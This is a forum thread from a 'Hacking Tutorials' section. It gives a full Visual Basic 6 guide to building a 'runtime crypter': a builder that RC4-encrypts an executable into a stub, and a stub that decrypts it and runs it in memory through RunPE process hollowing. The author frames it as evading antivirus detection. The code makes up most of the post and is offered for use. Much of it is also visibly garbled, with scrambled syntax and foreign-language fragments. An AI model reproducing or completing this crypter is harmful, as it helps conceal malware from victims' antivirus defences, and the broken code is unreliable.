Okara Cantt - Pakistan's Biggest IT Education Forum
Welcome To OkaraCantt - Pakistan's Biggest IT Education Forum. We Hope You Enjoy Your Visit.

You're Currently Viewing Our Forum As A Guest. This Means You Are Limited To Certain Areas Of The Board And There Are Some Features You Can't Use. If You Join Our Community, You'll Be Able To Access Member-Only Sections, And Use Many Member-Only Features Such As Customizing Your Profile, Sending Personal Messages, And Voting In Polls. Registration Is Simple, Fast, And Completely Free.



 
HomeCalendarFAQSearchRegisterLog in

Share | 
 

 █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█

Go down 
AuthorMessage
Administrator
ADMIN
ADMIN
avatar

Join date : 2011-04-16
Posts : 75
Points : 8919
Reputation : 5010
Gender : Male
Browser :

PostSubject: █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█   Sat Nov 19, 2011 3:50 am

Well, in this tutorial I will explain how to make your own Crypter Runtime (Runtime). The crypter not FUD, but that's not my point here. Just want to show what a crypter runtime. Well, if you are not familiar with Visual Basic 6, however, read some basic guidance on how to use it, so do not face any problems following this tutorial. So let's get it started, for this Crypter runtime we need to do two projects, the first project is crypter, and the second project will be the stub.[/color]

1. The Crypter:

Open a new project, and we will put several components. We need a textbox, two command buttons and a common dialog. And put the following in their properties.
Text1, Text = box which is the file path to encrypt Command1; Caption = Button that calls the file to encrypt Command2; Caption = Button to encrypt CommonDialog1; paste it anywhere in the form
PS: If you can not find the CommonDialog, make sure you have added to the components.

[You must be registered and logged in to see this image.]

[You must be registered and logged in to see this image.]

And, the form would look like.

[You must be registered and logged in to see this image.]

Now double-click Command1, and add these commands.

Code:

  With CommonDialog1
  . DialogTitle = "Select The file you Want to Protect"
  . Filter = "exe Files | *. exe"
  . ShowOpen
 End With

 If Not CommonDialog1.FileName = vbNullString Then

 Text1.Text = CommonDialog1.FileName

 End If

Double click Next Command2 and add these commands.

Code:
 As String Dim Stub

 Open App.Path & "\ Stub.exe 'For As # 1 Binary
 Stub = Space (LOF (1))
 Get # 1,, Stub
 Close # 1

 With CommonDialog1

  . DialogTitle = "Select Where You Want to Save Crypted File"
  . Filter = "EXE Files | *. exe"
  . ShowSave

 End With

 Dim File As String

 Open Text1.Text For Binary As # 1
 File = Space (LOF (1))
 Get # 1, File
 Close # 1

 File = RC4 (File, "therefenge)

 CommonDialog1.FileName Open For Binary As # 1
 Put # 1, Stub & "[Theref]" & File
 Close # 1

 MsgBox "Crypted Successfully", vbInformation

Ok, then you will see codes Command2 Command1 and now we have to RC4 function somewhere, copy this code below Command1 or Command2.

Code:
 Public Function RC4 (ByVal Data As String, ByVal Password As String) As String 'This is a Modified Function RC4 ^ ^
 On Error Resume Next
 Dim F (0 To 255) As Integer, X, Y As Long, Key () As Byte
 Key () = StrConv (Password, vbFromUnicode)
 For X = 0 To 255
  Y = (Y + F (X) + Key (X Mod Len (Password))) Mod 256
  F (X) = X
 X Next
 Key () = StrConv (Data, vbFromUnicode)
 For X = 0 To Len (Data)
  Y = (Y + F (AND) + 1) Mod 256
  Key (X) = Key (X) XOR F (Temp + F ((Y + F (Y)) Mod 254))
 X Next
 RC4 = StrConv (Key, vbUnicode)
 End Function

*******Well, we finished the client.******* *******Now we have to make the Stub.*******

2. Stub:
Ok, open a new project. And eliminate the form1 and you do not need any kind in our crypter. And add 2 modules in it.
The first module will be the main
The second module is the module RunPE

And will look like.

[You must be registered and logged in to see this image.]

Now, double-click the second module, and put in the form RunPE the following code.

Code:
Option Explicit

 CONTEXT_FULL As Long Private Const = & H10007
 Private Const MAX_PATH As Integer = 260
 CREATE_SUSPENDED As Long Private Const = & H4
 MEM_COMMIT As Long Private Const = & H1000
 MEM_RESERVE As Long Private Const = & H2000
 PAGE_EXECUTE_READWRITE As Long Private Const = & H40

 Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
 Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
 Private Declare Function OutputDebugString Lib "kernel32" Alias ​​"OutputDebugString" (ByVal lpOutputString As String) As Long

 Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
 Private Declare Function CallWindowProc Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
 Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
 Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

 Type Private SECURITY_ATTRIBUTES
 nLength As Long
 As Long lpSecurityDescriptor
 As Long bInheritHandle
 End Type

 Type Private STARTUPINFO
 cb As Long
 As Long lpReserved
 As Long lpDesktop
 As Long lpTitle
 As Long dwX
 As Long dwY
 As Long dwXSize
 As Long dwYSize
 As Long dwXCountChars
 As Long dwYCountChars
 As Long dwFillAttribute
 dwFlags As Long
 wShowWindow As Integer
 cbReserved2 As Integer
 As Long lpReserved2
 As Long hStdInput
 As Long hStdOutput
 As Long hStdError
 End Type

 Type Private PROCESS_INFORMATION
 hProcess As Long
 hThread As Long
 As Long dwProcessId
 As Long dwThreadId
 End Type

 Type Private FLOATING_SAVE_AREA
 As Long ControlWord
 As Long StatusWord
 As Long TagWord
 As Long ErrorOffset
 As Long ErrorSelector
 As Long DataOffset
 As Long DataSelector
 RegisterArea (1 To 80) As Byte
 As Long Cr0NpxState
 End Type

 Type Private CONTEXT
 As Long ContextFlags

 As Long DR0
 Dr1 As Long
 Dr2 As Long
 As Long dr3
 As Long DR6
 As Long DR7

 As FloatSave FLOATING_SAVE_AREA
 As Long SegGs
 As Long SegFs
 As Long SEGESA
 As Long SegDs
 Edi As Long
 Esi As Long
 As Long ebx
 As Long edx
 As Long ecx
 As Long eax
 As Long ebp
 As Long eip
 As Long SegCs
 As Long EFLAGS
 As Long GMT
 As Long SegSs
 End Type

 Type Private IMAGE_DOS_HEADER
 e_magic As Integer
 e_cblp As Integer
 e_cp As Integer
 e_crlc As Integer
 e_cparhdr As Integer
 e_minalloc As Integer
 e_maxalloc As Integer
 e_ss As Integer
 e_sp As Integer
 e_csum As Integer
 e_ip As Integer
 e_cs As Integer
 e_lfarlc As Integer
 e_ovno As Integer
 e_res (0 To 3) As Integer
 e_oemid As Integer
 e_oeminfo As Integer
 e_res2 (0 To 9) As Integer
 As Long e_lfanew
 Type End

 Type Private IMAGE_FILE_HEADER
 Machine As Integer
 NumberOfSections As Integer
 As Long TimeDateStamp
 As Long PointerToSymbolTable
 As Long NumberOfSymbols
 SizeOfOptionalHeader As Integer
 características As Integer
 End Type

 Type Private IMAGE_DATA_DIRECTORY
 As Long VirtualAddress
 Size As Long
 End Type

 Type Private IMAGE_OPTIONAL_HEADER
 Magic As Integer
 MajorLinkerVersion As Byte
 MinorLinkerVersion As Byte
 As Long SizeOfCode
 As Long SizeOfInitializedData
 As Long SizeOfUnitializedData
 As Long AddressOfEntryPoint
 As Long BaseOfCode
 As Long BaseOfData
 'NT Additional fields.
 ImageBase As Long
 As Long SectionAlignment
 As Long FileAlignment
 MajorOperatingSystemVersion As Integer
 MinorOperatingSystemVersion As Integer
 MajorImageVersion As Integer
 MinorImageVersion As Integer
 MajorSubsystemVersion As Integer
 MinorSubsystemVersion As Integer
 As Long W32VersionValue
 As Long SizeOfImage
 As Long SizeOfHeaders
 CheckSum As Long
 SubSystem As Integer
 DllCharacteristics As Integer
 As Long SizeOfStackReserve
 As Long SizeOfStackCommit
 As Long SizeOfHeapReserve
 As Long SizeOfHeapCommit
 As Long LoaderFlags
 As Long NumberOfRvaAndSizes
 DataDirectory (0 To 15) As IMAGE_DATA_DIRECTORY
 End Type

 Type Private IMAGE_NT_HEADERS
 Signature As Long
 As FileHeader IMAGE_FILE_HEADER
 As OptionalHeader IMAGE_OPTIONAL_HEADER
 End Type

 Type Private IMAGE_SECTION_HEADER
 SecName As String * 8
 As Long VirtualSize
 As Long VirtualAddress
 As Long SizeOfRawData
 As Long PointerToRawData
 As Long PointerToRelocations
 As Long PointerToLinenumbers
 NumberOfRelocations As Integer
 NumberOfLinenumbers As Integer
 As Long características
 End Type

 CallAPI Private Function (ByVal slib As String, ByVal smod As String, ParamArray Params ()) As Long
 As Long Dim LPTR
 Dim bvASM (& HEC00 & - 1) As Byte
 Dim i As Long
 As Long Dim LMOD

 LMOD = GetProcAddress (LoadLibraryA (SLIB), smod)
 If LMOD = 0 Then Exit Function

 LPTR = VarPtr (bvASM (0))
 ByVal RtlMoveMemory LPTR, & H59595958, & H4: LPTR = LPTR + 4
 ByVal RtlMoveMemory LPTR, & H5059, & H2: LPTR LPTR + 2 =
 For i = UBound (Params) To 0 Step -1
 ByVal RtlMoveMemory LPTR, & H68, & H1: LPTR LPTR + 1 =
 ByVal RtlMoveMemory LPTR, CLng (Params (i)), & H4: LPTR LPTR + 4 =
 Next
 ByVal RtlMoveMemory LPTR, & HE8, & H1: LPTR LPTR + 1 =
 ByVal RtlMoveMemory LPTR, LMOD - LPTR - 4, & H4: LPTR LPTR + 4 =
 ByVal RtlMoveMemory LPTR, & HC3, & H1: LPTR LPTR + 1 =
 CallAPI = CallWindowProc (VarPtr (bvASM (0)), 0, 0, 0, 0),
 End Function

 Injec Sub (ByVal sHost As String, ByRef bvBuff () As Byte, Parameter As String)
 Dim i As Long
 IHDP Dim As IMAGE_DOS_HEADER
 Dim As IMAGE_NT_HEADERS Pinho
 Pish Dim As IMAGE_SECTION_HEADER
 If Dim As STARTUPINFO
 Dim Pi As PROCESS_INFORMATION
 Ctx Dim As CONTEXT

 Si.cb = Len (Si)

 IHDP RtlMoveMemory, bvBuff (0), 64
 RtlMoveMemory Pinho, bvBuff (Pidh.e_lfanew), 248

 CreateProcessA sHost, "" & parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi
 CallAPI "ntdll", "NtUnmapViewOfSection" Pi.hProcess, Pinh.OptionalHeader.ImageBase
 CallAPI "kernel32" "VirtualAllocEx" Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT MEM_RESERVE Or, PAGE_EXECUTE_READWRITE
 WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase, bvBuff (0), Pinh.OptionalHeader.SizeOfHeaders, 0

 For i = 0 To Pinh.FileHeader.NumberOfSections - 1
 Pish RtlMoveMemory, bvBuff (Pidh.e_lfanew + 248 + 40 * i), Len (Pish)
 WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, bvBuff (Pish.PointerToRawData) Pish.SizeOfRawData, 0
 Next i

 Ctx.ContextFlags = CONTEXT_FULL
 CallAPI "kernel32", "GetThreadContext" Pi.hThread, VarPtr (Ctx)
 WriteProcessMemory Pi.hProcess, ByVal Ctx.Ebx + 8, Pinh.OptionalHeader.ImageBase, 4, 0
 Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
 CallAPI "kernel32", "SetThreadContext" Pi.hThread, VarPtr (Ctx)
 CallAPI "kernel32", "ResumeThread" Pi.hThread
 Sub End

 StrToBytArray Public Function (ByVal SSTR As String) As Byte ()
 Dim i As Long
 Dim Buffer () As Byte
 ReDim Buffer (Len (SSTR) - 1)
 For i = 1 To Len (SSTR)
 Buffer (i - 1) = Asc (Mid (SSTR, i, 1))
 Next i
 StrToBytArray = Buffer
 End Function

 ThisExe Public Function () As String
 As Long Dim LRET
 Dim bvBuff (255) As Byte
 CallAPI LRET = ("kernel32", "GetModuleFileNameA" App.hInstance, VarPtr (bvBuff (0)), 256)
 ThisExe $ = Left (StrConv (bvBuff, vbUnicode) LRET)
 End Function

Put these codes in the first module.

Code:
  Sub Main ()

 As String Dim SHIT

 SHIT = App.Path & "\" & App.EXEName & ". Exe"

 Dim Data As String

 SHIT Open For Binary As # 1

 Data = Space (LOF (1))
 Get # 1,, Data
 Close # 1

 Dim Delimiter () As String

 Delimiter () = Split (Data, "[Theref]")

 Delimiter (1) = RC4 (Delimiter (1), "therefenge)

 Injec Call (SHIT, StrConv (Delimiter (1), vbFromUnicode), vbNullString),

 End Sub

 Public Function RC4 (ByVal Data As String, ByVal Password As String) As String 'This is a Modified Function RC4 ^ ^
 On Error Resume Next
 Dim F (0 To 255) As Integer, X, Y As Long, Key () As Byte
 Key () = StrConv (Password, vbFromUnicode)
 For X = 0 To 255
  Y = (Y + F (X) + Key (X Mod Len (Password))) Mod 256
  F (X) = X
 X Next
 Key () = StrConv (Data, vbFromUnicode)
 For X = 0 To Len (Data)
  Y = (Y + F (Y) + 1) Mod 256
  Key (X) = Key (X) XOR F (Temp + F ((Y + F (Y)) Mod 254))
 X Next
 RC4 = StrConv (Key, vbUnicode)
 End Function

Note that the "Sub Main ()" is the first thing the Stub will do when it runs.

Therefore, it should be the crypter and Stub in the same directory. Now, compile the crypter in Crypter.exe (or Etc.exe), but you have to compile the stub as Stub.exe (Just take out the script that needs crypter "Stub.exe").
Having collected all of them, place them in a folder.

[You must be registered and logged in to see this image.]

Woah! You just make your own Crypter Runtime.
It's all for now, then the stub is left modear Rump or find a less burnt this to be less detected stub...
Back to top Go down
http://www.okaracantt.com
pum4
Member
Member
avatar

Join date : 2012-03-08
Posts : 1
Points : 1
Reputation : 1
Gender : Male
Age : 63
Browser :
Location : kns

PostSubject: Re: █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█   Fri Mar 09, 2012 12:35 am

button 2 code is bad

As String Dim Stub

Open App.Path & "\ Stub.Exe 'For As # 1 Binary
Stub = Space (LOF (1))
Get # 1,, Stub
Close # 1

With CommonDialog1

. DialogTitle = "Select Where You Want To Save Crypted File"
. Filter = "EXE Files | *. Exe"
. ShowSave

End With

Dim File As String

Open Text1.Text For Binary As # 1
File = Space (LOF (1))
Get # 1, File
Close # 1

File = RC4 (File, "Therefenge)

CommonDialog1.FileName Open For Binary As # 1
Put # 1, Stub & "[Theref]" & File
Close # 1

MsgBox "Crypted Successfully", VbInformation
Back to top Go down
 
█▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█
Back to top 
Page 1 of 1
 Similar topics
-
» How to create a test suite in Selenium?
» How to use ANT build to create HTML reports in Eclispe
» Create Batch file for Selenium
» Dream Theatre-Octavarium Full Album Zip
» Create a Caption Contest *usa only*

Permissions in this forum:You cannot reply to topics in this forum
Okara Cantt - Pakistan's Biggest IT Education Forum  :: Hacks, Exploits, and Various Discussions :: Hacking Tutorials-
Jump to:  

Chat Room OKaraCantt.CoM

Free forum | © phpBB | Free forum support | Contact | Report an abuse | Forumotion.com